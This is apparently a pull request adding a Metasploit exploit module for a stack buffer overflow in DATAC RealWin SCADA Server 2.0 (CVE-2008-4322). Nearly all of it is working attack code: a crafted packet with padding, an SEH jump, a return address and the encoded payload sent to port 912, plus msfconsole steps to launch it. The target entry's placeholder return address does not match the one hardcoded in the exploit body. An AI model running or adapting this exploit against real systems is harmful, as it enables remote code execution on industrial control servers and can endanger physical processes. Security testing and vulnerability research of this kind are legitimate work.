### PR TITLE
Create realwin_seh_buffer_overflow.rb

### DIFF
--- a/modules/exploits/windows/scada/realwin_seh_buffer_overflow.rb
+++ b/modules/exploits/windows/scada/realwin_seh_buffer_overflow.rb
@@ -1,0 +1,72 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DATAC RealWin SCADA Server Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack buffer overflow in DATAC Control
+        International RealWin SCADA Server 2.0 (Build 6.0.10.37).
+        By sending a specially crafted packet to port 912,
+        an attacker may be able to execute arbitrary code.
+      },
+      'Author'         => [ 'sml555 & n33dle' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2008-4322' ],
+          [ 'OSVDB', '48606' ],
+          [ 'BID', '31418' ],
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'PrependMigrate' => true,
+        },
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x20\x0a\x0d",
+          'DisableNops' => true,
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows', { 'Offset' => 0, 'Ret' => 0x00000000 } ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Sep 26 2008'))
+
+    register_options([Opt::RPORT(912)], self)
+  end
+
+  def exploit
+    connect
+
+    header = "\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00"
+    # data = pattern_create(10000)
+
+    data = "A" * 222
+
+    data << "\xeb\x06\xff\xff"
+    data << "\xec\xa6\x02\x40"
+
+    data << payload.encoded
+
+    data << "D" * (10000 - 222 - 8)
+
+    buffer = header
+    buffer << data
+
+    print_status("Trying target #{target.name}...")
+    sock.get_once
+    sock.put(buffer)
+
+    handler
+    disconnect
+  end
+
+end
+


### PR DESCRIPTION
This change adds in a meterpreter exploit for realwin (CVE-2008-4322). 

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/scada/realwin_seh_buffer_overflow`
- [ ] Set RHOSTS
- [ ] Run exploit
